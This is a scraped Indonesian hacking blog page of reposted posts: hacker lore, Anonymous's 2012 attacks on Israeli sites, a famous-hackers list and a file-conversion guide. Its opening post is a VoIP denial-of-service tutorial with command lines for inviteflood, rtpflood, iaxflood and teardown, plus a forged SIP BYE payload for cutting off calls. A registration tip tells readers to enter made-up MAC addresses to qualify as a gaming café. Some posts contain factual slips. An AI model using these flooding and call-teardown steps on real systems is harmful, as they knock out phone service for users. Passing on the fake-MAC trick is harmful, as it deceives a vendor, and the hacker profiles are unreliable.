BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.
Tampilkan postingan dengan label Infomasi. Tampilkan semua postingan
Tampilkan postingan dengan label Infomasi. Tampilkan semua postingan

Denial Of Service

A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
 Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort  (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Sumber http://hoznimonzter.blogspot.com

Kronologis Serangan Anonymous ke Israel

Sidoarjo_Hacking - Serangan udara Israel ke jalur Gaza dikecam banyak pihak. Di dunia maya, kelompok hacker Anonymous pun mengutuk aksi biadab negara zionis tersebut, bahkan mereka melakukan perlawanan atas nama kemanusiaan.

Bermula dari kecaman yang ternyata tak digubris oleh pemerintah Israel, membuat kelompok yang selalu menggunakan topeng khas bila muncul ke dunia nyata itu geram, sehingga melakukan aksi penyerangan.

Berikut kronologis serangan Anonymous terhadap sejumlah situs Israel.
 
14 November 2012

Para pengunjuk rasa yang mengaku menjadi bagian dari gerakan Anonymous mengecam serangan 14 November oleh militer Israel terhadap pimpinan Hamas yang diduga bertanggung jawab atas ratusan serangan roket terhadap warga sipil Israel.

Dalam sebuah pernyataan online, Anonymous memperingatkan Israel Defense Force (IDF) -- militer Israel -- untuk tidak untuk memotong akses online warga Palestina di Gaza untuk mendapatkan pesan ke dunia, meskipun tidak jelas apakah IDF benar-benar untuk melakukannya. 

"Untuk rakyat Gaza dan wilayah pendudukan, kami Anonymous berada di samping Anda untuk bertarung," kata pernyataan itu. 

"Kami akan melakukan segalanya dalam kekuasaan kami untuk menghambat kekuatan jahat IDF yang tersusun terhadap Anda. Kami akan menggunakan semua sumber daya kami untuk memastikan Anda tetap terhubung ke Internet dan tetap dapat mengirimkan pengalaman Anda ke seluruh dunia."

Protes secara online yang dijuluki 'OpIsrael' datang setelah Israel melancarkan serangan terhadap pemimpin Hamas di Gaza sebagai pembalasan atas rudal yang dikirimkan beberapa hari terakhir. Hamas telah meluncurkan lebih dari 500 roket dan rudal ke wilayah Israel pada tahun 2012, menurut statistik yang dikumpulkan oleh pemerintah Israel.

15 November 2012

Pagi hari di 15 November 2012, sebuah postingan diduga dari pendukung Anonymous mengkritik Israel karena serangan yang brutal. Pada saat yang sama, Anonymous mulai melakukan serangan berbasis denial-of-service (DDoS).

Serangan pertama ini mulai menargetkan website dari Angkatan Pertahanan Israel dan kantor Perdana Menteri serta bank Israel, maskapai penerbangan dan perusahaan infrastruktur.

Pada tanggal yang sama, anggota gerakan ini melunak. Mereka mengaku tidak pada pihak manapun dari konflik ini.

"Anonymous tidak mendukung kekerasan oleh IDF atau Perlawanan Palestina / Hamas. Perhatian kami adalah untuk anak-anak Israel dan Wilayah Palestina dan hak-hak orang-orang di Gaza untuk menjaga jalur komunikasi yang terbuka dengan dunia luar."

17 November 2012

Kelompok Anonymous kembali kobarkan pernyataan cyberwar terhadap Israel melalui sebuah postingan video YouTube yang diupload tertanggal 17 November 2012. Di video tersebut, salah seorang yang diduga Anonymous tersebut mengucapkan janji akan menyerang Israel, bila negara tersebut belum berhenti membombardir Gaza.

Dalam pesan yang diklaim merupakan Anonymous Collective, kelompok itu berjanji akan melakukan segala upaya untuk melumpuhkan sistem internet Israel, mulai dari hack, deface, docks, hijack, mencuri informasi di database, mengambil alih admin dan mematikan DNS.

19 November

Sampai Senin (19/11), Anonymous mengklaim telah meretas ratusan situs yang berbasis di Israel. Tidak hanya itu, Anonymous juga dilaporkan telah mencuri email dan password, serta database krusial dari Bank Jerusalem dan Kementerian Luar Negeri Israel.

Anonymous mengaku telah menangguk sejumlah data sensitif. Di antaranya berisi lebih dari 3.000 data individu yang telah mendonasikan uangnya untuk kelompok pro Israel, Unity Coalition for Israel.

Data-data tersebut ditemukan Anonymous pasca memborbardir hampir 700 situs milik Israel dan menguras sejumlah database situs-situs yang diacak-acaknya tersebut.

SUMBER

Situs yang Dapat Membuat Kamu Serasa Jadi Hacker

http://cirebon-cyber4rt.blogspot.com/2012/08/situs-yang-dapat-membuat-kamu-serasa.html

Ok, sekarang kita lanjut ke topik kita hari ini... yaitu tentang Hacking. Bagi kalian yang suka dengan salah satu topik pembahasan utama blog ini, yaituhacking, dapat mencoba situs yang saya temukan disalah satu thread Forum Hacking Indonesia "Devilzc0de".

Berikut Situs Websitenya :
Tugas kalian hanyalah mengetikan tombol apa saja pada keyboard, secara otomatis kode-kode yang belum kita kenal akan muncul. Background hitam dan font yang berwarna hijau menghiasi website tersebut.

Screenshotnya :
http://cirebon-cyber4rt.blogspot.com/2012/08/situs-yang-dapat-membuat-kamu-serasa.html
Hacker Typer Screenshot

Hehehe, gimana udah berasa jadi Hacker? yaa... walaupun hanya sebuah rekayasa, tapi yang penting kita udah bisa merasakan jadi seorang hacker :D


REMAJA 16 TAHUN INI BERHASIL JEBOL WINDOWS PHONE 8

 
Seorang remaja Abg yang baru berusia 16 tahun ini sudah memiliki keahlian dibidang teknologi yang sangat luar biasa di usianya yang masih belia bocah ini sudah berhasil menjebol sistem oprasi untuk ponsel pintar terbaru dari microsoft yakni Windows Phone 8.

Bocah 16 tahun yang bernama Shantanu Gawde berhasil mencuri perhatian banyak orang di dunia teknologi khususnya dibidag IT, usianya yang masih beli Shantanu Gawde sudah berhasil menjebol sistem oprasi teranyar Windows Phone 8. Seperti yang dilansir palingseru.
 

Prestasi yang di miliki Shantanu Gawde bukan hanya itu saja di usia 7 tahun saja dia sudah mendapatkan sertif, di negaranya India tepat dia tinggal Shantanu Gawde telah dikenal sebagai Youngest Etchical Hacke.
 

Pada tahun lalau Shantanu Gawde juga pernah menjebol salah satu produk dari microsoft, Shantanu Gawde pernah meretes Kincet untuk mengambil foto tanpa diketahui pemilik komputer Windows 7 yang telah disisipi malware.
 

Kemampuan Shantanu Gawde membobol windows phone 8 dilakukan di sebuah acara Malcon Security di New Delhi, India. Dalam acara tersebut Shantanu Gawde mempertontonkan lubang di Windows Phone 8 yang ditembusnya sehingga mampu mencuri kontak informasi, personal data dan gambar user.
 

Aksi yang dilakukan remaja 16 tahun ini yang berhasil mejebol Windows Phone 8 masih belum mendapatkan tanggapan dari pihak Microsoft, apakah bug yang berhasil ditemukan oleh Shantanu Gawde ini akan dibiarkan atau akan segera diperbaiki, kita lihat saja nanti.


sumber  

apa pengertian Anonymous ?

Sidoarjo_Hacking-Anonymous (digunakan sebagai kata benda massa) adalah sebuah meme internetyang berasal pada tahun 2003 di 4chan imageboard, mewakili konsep banyakpengguna komunitas online secara bersamaan yang ada sebagai otak, anarkis globaldigital. Hal ini juga umumnya dianggap sebagai selimut istilah untuk anggotasubkultur Internet tertentu, cara untuk mengacu pada tindakan orang di lingkungan di mana identitas yang sebenarnya mereka tidak diketahui.
Dalam bentuk awal, konsep ini telah diadopsi oleh komunitas on-line desentralisasianonim bertindak secara terkoordinasi, biasanya menuju tujuan longgar diri setuju, danterutama terfokus pada hiburan. Dimulai dengan 2008, Anonymous kolektif telah menjadi semakin terkait dengan kolaboratif, hacktivism internasional, melakukan protesdan tindakan lainnya, seringkali dengan tujuan mempromosikan kebebasan internet dankebebasan berbicara. Tindakan dikreditkan ke ”Anonymous” yang dilakukan oleh orangtak dikenal yang menerapkan label Anonymous pada diri mereka sendiri sebagaiatribusi.
Meskipun tidak harus terikat kepada sebuah entitas yang on-line tunggal, banyak situsyang berkaitan erat dengan Anonymous. Ini termasuk imageboards terkemuka seperti4chan, Futaba, wiki terkait, Encyclopædia Dramatica, dan sejumlah forum [5] Setelahserangkaian kontroversial, protes yang dipublikasikan secara luas dan distribusi penolakan layanan (DDoS) serangan oleh Anonymous pada tahun 2008,. insiden terkaitdengan anggota kader yang telah meningkat  Dalam pertimbangan kemampuannya,Anonymous telah diasumsikan oleh CNN menjadi salah satu dari tiga penerus utamaWikiLeaks..

Sebuah cosplays tokoh anonim sebagai Anonymous. Difoto di ROFLcon pada April 26, 2008
Nama Anonymous sendiri terinspirasi oleh anonimitas dirasakan di mana penggunaposting foto dan komentar di Internet. Penggunaan Anonymous istilah dalam arti sebuah identitas bersama dimulai pada imageboards. Sebuah tag Anonymous ditugaskanuntuk pengunjung yang meninggalkan komentar tanpa mengidentifikasi pencetus isidiposting. Pengguna imageboards kadang-kadang bercanda bersikap seolah-olahAnonymous adalah orang yang nyata. Sebagai popularitas imageboards meningkat,gagasan Anonymous sebagai sebuah kolektif individu yang tidak disebutkan namanyamenjadi meme internet.
Anonymous luas merupakan konsep dari setiap dan semua orang sebagai sebuahkolektif yang tidak disebutkan namanya. Sebagai nama ganda digunakan, individu-individu yang berbagi dalam moniker ”Anonymous” juga mengadopsi identitas onlinebersama, ditandai sebagai hedonistik dan tanpa hambatan. Hal ini dimaksudkansebagai adopsi, satir sadar efek rasa malu online. [Anonymous adalah] superconsciousness berbasis Internet pertama. Anonymousadalah kelompok, dalam arti bahwa sekawanan burung merupakan grup. BagaimanaAnda tahu mereka grup? Karena mereka sedang bepergian ke arah yang sama. Padasaat tertentu, burung lebih bisa bergabung, meninggalkan, lepaskan ke arah lain sama sekali. ”

-Chris Landers. Baltimore City Paper, 2 April 2008.
Anonymous terdiri sebagian besar pengguna dari beberapa imageboards dan foruminternet. Selain itu, beberapa wiki Internet Relay Chat jaringan yang dipelihara untukmengatasi keterbatasan imageboards tradisional. Mode ini komunikasi adalah saranayang pengunjuk rasa Anonymous berpartisipasi dalam Proyek Chanologyberkomunikasi dan mengatur protes yang akan datang.
Sebuah ”koalisi longgar dari penghuni Internet,”  grup ini bersatu dengan internet,melalui situs seperti 4chan,  11chan, Encyclopædia Dramatica, channel IRC,  dan YouTube.layanan jaringan sosial, seperti Facebook,digunakan untuk menciptakan kelompok yang menjangkau orang untuk mobilisasiprotes dunia nyata.
Anonymous tidak memiliki pemimpin partai atau mengontrol dan bergantung padakekuatan kolektif peserta individu bertindak sedemikian rupa bahwa manfaat efekbersih grup.  ”Setiap orang yang ingin bisa Anonymous dan bekerja menuju tujuan ..set . ”anggota Anonymous menjelaskan kepada Baltimore City Paper. ”Kami memilikiagenda ini bahwa kita semua menyetujui dan kita semua mengkoordinasikan danbertindak, tapi semua bertindak independen ke arah itu, tanpa ingin pengakuan Kamihanya. ingin mendapatkan sesuatu yang kita rasa penting dilakukan ..


source >wikipedia

Anonymous Serang Situs Pemerintah Israel



Id.Yahoo.Com, Yerusalem - Sekelompok peretas yang menamakan diri mereka Anonymous meluncurkan serangan ke situs-situs yang dimiliki Pemerintah Israel. Serangan itu merupakan respon terhadap serbuan bom dan hujan amunisi ke perbatasan Gaza yang terjadi tiga hari terakhir.
"Ada banyak situs-situs Israel yang sudah kami rusak sekarang, kami baru saja membuat daftarnya," ujar kicauan Anonymous dalam akun twitter @YourAnonNews. Akun tersebut juga meminta para pengikutnya untuk merusak sekitar 40 situs miliki pemerintah dan militer Israel.
Target terbesar Anonymous adalah situs Angkatan Bersenjata Israel dan situs Perdana Menteri Benjamin Netanyahu. Mereka juga berencana merusak situs-situs sejumlah perusahaan keamanan dan keuangan milik warga Israel.
Proyek ini direncanakan matang. Sebab sebelum meretas, Anonymous mengeluarkan pengumuman pencarian lowongan penutur bahasa Arab sebagai penerjemah, lalu orang-orang yang masih berada di Gaza, di luar Gaza, operator radio di Gaza dan ahli-ahli gelombang radio.
Anonymous juga berusaha menjalin hubungan dengan warga Gaza. Meski kini kota kecil tersebut kekurangan listrik akibat serangan Israel. Para peretas meminta pengikutnya untuk mengabarkan bagaimana caranya tetap terkoneksi dengan dunia luar.
"Jika kalian mempunyai teman di Gaza yang masih terkoneksi telepon, berikan nomornya, dan ikuti petunjuk di http://pastebin.com/6dYqruHu" tulis akun @YourAnonNews. Petunjuknya untuk mengkoneksikan internet di Gaza mereka tulis di katatus.blogspot.com
Pada situs-situs yang sudah mereka retas, Anonymous akan menuliskan pernyataan bahwa mereka sudah menguasai situs tersebut. Mereka pun menolak untuk mengembalikan kondisi situs tersebut, karena menyebut Israel sebagai "sebuah negara Zionis Pengecut" karena telah menghancurkan kehidupan orang-orang tak bersalah.

Sumber: Yahoo

Apa Itu Hacker? Apa Sama Dengan Hax0r?

Sidoarjo_Hacking - Anda mungkin pernah atau sering mendengar tentang "hacker", dan anda juga mungkin sudah melihat versi sensasional dari hacker di film-film atau aksi mereka di dunia maya. Tapi apa sebenarnya hacker? apakah sama dengan "haxors"?

Apa Itu Hacker? Apa Sama Dengan Hax0r?

Seorang hacker adalah seorang pengguna komputer yang memiliki keterampilan di atas rata-rata,baik itu bermotivasi negatif atau positif,memanipulasi dan masuk ke sistem komputer. Anda akan melihat istilah "hacker" dieja kreatif dengan cara yang berbeda, seperti "haxor", "Hax0r", dan "h4x0r",tapi semuanya berarti sama.
Apa Itu Hacker? Apa Sama Dengan Hax0r?

Bagi sebagian orang hacker identik dengan kejahatan.Namun sekarang, istilah hacker juga telah diperluas mencakup non-kriminal bagi pengguna komputer.Saat ini penggolongan hacker di tandai dengan istilah warna topi.

Ada 3 tipe modern hacker:
   
  •     Black Hats: Criminal Hackers. pekerjaan: Penetration Tester.
  •     White Hats: Ethical Hackers. pekerjaan: spesialis keamanan jaringan.
  •     Grey Hats:  Jack of all trades, Master of none.pekerjaan:berdasarkan hobi.

1) Classic "Black Hat" Hacker = Penjahat / Pelanggar Hukum

    Ini adalah definisi klasik dari hacker: pengguna komputer yang dengan sengaja berusaha untuk mengacaukan atau melakukan pencurian pada jaringan orang lain.Hacker klasik macam ini juga dikenal sebagai "black hat hacker" karena motivasi berbahaya yang dimilikinya.Black hat adalah pengguna komputer berbakat tapi aksinya sering dimotivasi oleh perasaan kekuasaan dan balas dendam. Mereka adalah penjahat elektronik, dalam setiap arti kata, dan berbagi ciri-ciri kepribadian yang sama mirip remaja penggemar tawuran yang memecahkan kaca-kaca mobil,merusak demi kepuasan pribadi.Namun itu adalah relatif,tergantung dari motif pelakunya secara personal.

Hacker tipe ini biasanya melakukan metode serangan seperti:
  •  DOS / DDOS: serangan yang membebani server internet.
  •  Mendeface website dengan membajak kendali dan mengganti tampilan halaman utama dengan slogan-slogan tertentu.
  •  Melakukan pencurian identitas dengan mencuri informasi pribadi dari individu.
  •  Botnetting: mengendalikan dari jarak jauh puluhan bahkan ratusan komputer pribadi,memprogram mereka untuk menjadi "zombie"lalu menyebar spam.

2) White Hat "Ethical Hackers" =Spesialis keamanan jaringan

    Berbeda dengan black hat hacker klasik,white hat memiliki kehormatan, atau setidaknya memiliki motivasi yang terkendali.White Hat hacker adalah seorang ahli keamanan komputer berbakat yang diberdayakan untuk membantu melindungi jaringan komputer sebuah perusahaan/institusi.Sementara mereka sendiri mungkin tidak sepenuhnya etis, hacker tipe ini biasanya dimotivasi oleh gaji yang besar. Hal ini tidak mengejutkan melihat pengeluaran mereka untuk urusan komputer pribadi sangat mahal dalam kehidupan mereka, sehingga mereka dapat bermain game online setelah bekerja misalnya. Selama mereka memiliki pekerjaan yang baik dengan gaji yang mendukung, seorang hacker tipe ini biasanya tidak termotivasi lagi untuk menghancurkan atau mencuri dari majikan mereka.

Jenis lain dari white hat adalah "Academic Hackers": ahli komputer yang tidak tertarik dalam melindungi sistem, melainkan dalam menciptakan program pintar dan interface yang indah. Jika anda adalah seorang hacker akademik, misalnya, anda akan mengambil kode program yang ada,memodifikasi, memperbaiki hingga jauh lebih baik dari sebelumnya. "Hacking Akademik" adalah tentang obsesi berinovasi pada kode komputer sehingga menjadi lebih indah atau lebih efisien sebagai sebuah program. Hacker akademik, secara umum, tidak berbahaya dan tidak berusaha untuk merusak jaringan orang lain.Hacker jenis ini biasanya adalah orang-orang lulusan sekolah pemograman komputer.

3) Grey Hat Hacker = Ketidakpastian sisi.

     Grey hat sering di samakan dengan "hacker hobi": pengguna dengan keterampilan teknologi dasar atau menengah yang suka membongkar dan memodifikasi komputer mereka sendiri demi kesenangan pribadi, dan juga kerap aktif dalam kegiatan seperti file-sharing film atau crack software.Penggemar peer to peer(P2P). Dan memang, jika anda pernah memodifikasi router dan firewall untuk download lebih cepat P2P, anda bisa menggambarkan diri anda sebagai seorang hacker Grey Hat.Bersyukurlah,karena hanya sebagian kecil dari hacker tipe yang pernah meningkat menjadi black hat hacker  yang serius.

Semoga Bermanfaat ^_^
Jangan Lupa Kembali Lagi Ya Ke Sidoarjo_Hacking


Follow & Tinggalkan KOMENTAR Anda


Kode Etik Hacker


Kode Edit Hacker :

1. Mampu mengakses komputer tak terbatas dan totalitas.

2. Semua informasi haruslah FREE.

3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.

4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.

5. Mampu membuat seni keindahan dalam komputer.

6. Komputer dapat mengubah hidup menjadi lebih baik.

7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.

8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.

9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.

10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Cracker tidak memiliki kode etik apapun.

Aturan Main Hacker

Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio, yaitu:

· Di atas segalanya, hormati pengetahuan & kebebasan informasi.

· Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.

· Jangan mengambil keuntungan yang tidak fair dari hack.

· Tidak mendistribusikan & mengumpulkan software bajakan.

· Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.

· Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh.

· Tidak pernah meng-hack sebuah sistem untuk mencuri uang.

· Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.

· Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack.

· Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main sedang cracker tidak mempunyai kode etik ataupun aturan main karena cracker sifatnya merusak. 
 Sumber

Semoga Postingan Ini Bermanfaat Bagi Semua nya .

Cara Mendaftar G-Warnet dirumah





Pasti Ada Sebagian dari Kita yang Pengen Banget Masuk Server Khusus G-Warnet.
Tapi , diwilayah Anda. Jarang Warnet yang Terdaftar Menjadi G-Warnet atau Anda Ingin Mendaftarkan Komputer Rumahmu Menjadi Salah Satu G-Warnet.
Nah , Disini Saya Akan Memberikan Sedikit TIPS Supaya Anda Bisa Mendaftarkan Komputer Rumah Anda Menjadi Salah Satu dari Bagian G-Warnet.
Tapi , Sebelumnya Silahkan Baca Terlebih dahulu Keuntungan , Effect Negatif , Effect Positif dll.

Kelebihan Menggunakan G-Warnet:
• Mendapatkan EXP UP
• Mendapatkan POINT UP
• Aman dari Segala Jenis Macam Cheater.

Oke, Langsung saja ke Tutornya.
• Buat Account G-Warnet Dulu. dan Ikuti Cara Registrasinya
• Pilih G-Warnet Premium. Jangan G-Warnet yang GOLD
• Downlolad Form yang Disediakan , Lalu di Print
• Isi Form yang Sudah di Print dengan Lengkap.
• Jangan Lupa , Sertakan Materai Rp.6000 dan di Tanda Tangani
• Minimal PC yang di Daftarkan Ada 5 PC. Jadi , Kita Isi Form Bagian MAC Addres Hanya 1 PC. Yaitu MAC Address PC Kita. nah , 4 PC Lainnya . MAC Addressnya Isi Asal²an Saja.
• Lalu , Form tadi kita Scanner atau di Photo. Terserah Sih , yang Penting Isinya Jelas.
• Kemudian . Kirim Hasil Scanner atau Photo Form Tadi ke : approve@taiga.co.id
Tinggal Menunggu Proses PengAprovean dari Pihak Gemscool.
-WARNING-
Ini Adalah Info Verieved. Namun Tidak disarankan Untuk Para Cheater !!Apabila Anda Adalah Seorang Cheater. Jangan Pernah Mendaftar Menjadi G-Warnet. Karena taiga.co.id dan gwarnet.com adalah Bagian dari PT.Kreon. Masalah yang Akan Anda Hadapi Apabila Anda Cheater dan Mengikuti System Ini Adalah :


Negatifnya Untuk Para Cheaters:
- Anda Terjerat dengan Hukum Jika Melakukan Sesuatu yang Dilarang oleh RulesgGame dan TOS PT. KREON, Baik itu Disengaja atau Tidak Disengaja ( Urusannya Polisi ).
- Walaupun di Iming-Imingi dengan +EXP dan +POINT tapi tidak Akan Ada Freedom dalam Memainkan Game ini Lagi , Mereka Telah Melisting IP , dan Nama Kamu Hingga Sangat Mudah di Trace ( Khusus Untuk IP Static ).

Negatifnya untuk PT. KREON:
- Akan Kesulitan untuk Mereka Untuk Melisting IP Dynamic di Indonesia.
- Akan Memiliki Kesulitan Jika IP/MAC Address Berubah Jika Eth Card Rusak atau Perubahan IP.

Credit : 
 http://best-cheater.blogspot.com 

Cara Merubah File MP3 Menjadi SWF


Pada artikel ini, akan dijelaskan bagaimana menggunakan aplikasiTotal Video Converter dariAiseesoft.com untuk mengkonversi file musik yang berekstension mp3 menjadi file musik yang berekstension swf.  

Software ini dapat digunakan untuk mengkoversi berbagai type file musik lainnya yang biasa digunakan di berbagai macam gadget seperi iPonePSPXboxHP iPaqdan sebagainya dengan sangat mudah, jika anda mendownload software ini, mungkin Anda akan dapat lebih banyak bereksperimen.  Seperti judul aplikasi ini, Total Video Converter maka anda dapat pula mengkonversi file video ke berbagai ekstension termasuk video yang akan di upload ke situs Youtube.

Konversi file mp3 ke file swf yang saya praktekkan pada artikel ini, hanyalah sebagai gambaran bagaimana menggunakan aplikasi Total Video Converter, karena materi yang ada pada artikel ini akan berhubungan dengan artikel yang akan saya tulis, tentang masukkan musik sebagai background blog.  Sebelumnya silahkan anda download terlebih dahulu software Totoal Video Converter, silahkan klik tombol download di bawah ini.


  • Versi: v3.3.20
  • Operating system: Windows XP/Vista/7/2000
  • Password Download:

Jika aplikasi telah berhasil di download, ekstrak file dengan 7zip. atau winRAR dan lakukan instalasi software, untuk langkah instalasi lihat file petunjuk instalasi.txt yg terikut di dalam file kompresi,  selanjutnya silahkan iktuti langkah seperti di bawah ini untuk melakukan konversi file mp3 ke swf.
  • Silahkan buka aplikasi Aiseesoft Total Video Converter, seperti gambar di bawah ini,
Music Converter 1
  • Masukkan file mp3 yang akan di konversi dengan menekan tombol Add File [1]
  • Pastikan file yang akan di konversi masuk ke dalam tabel [2]
  • Pada bagian Profile pilih All Profiles [3]
  • Selanjutnya pilih output file atau format file yang akan dihasilkan dalam hal ini saya memilih SWF - SWF Format (*.swf) [4]
  • Arahkan tempat penyimpanan file hasil konversi, pada bagian Destination [6] dengan menekan tombolBrowse [5]
  • Setelah itu tekan tombol Start [7]
  • Tunggu beberapa saat, biarkan proses konversi berjalan sampai selesai
Music Converter 2
  • Sampai di sini proses konversi file mp3 to swf selesai, silahkan anda mencobanya dan jika berhasil ucapkan Alhamdulillah..
sumber: multipaste.blogspot.com

14 Hacker Terbaik di Dunia

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.

Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :

1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster “FBI Most Wanted”.
Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.
Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.

2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.
Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.
Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.

3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.
Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)
Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.
Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.

4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.
Merasa terganggu oleh software komersial dan dan hak cipta pribadi.
Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.

7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.

8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.
Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.
Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.
Ditangkap Interpol di Heathrow Airport pada tahun 1995

10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.

11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.

12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.
Menurut Eric, “dunia mempunyai banyak persoalan menarik dan menanti untuk dipecahkan”.

14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia.

Sumber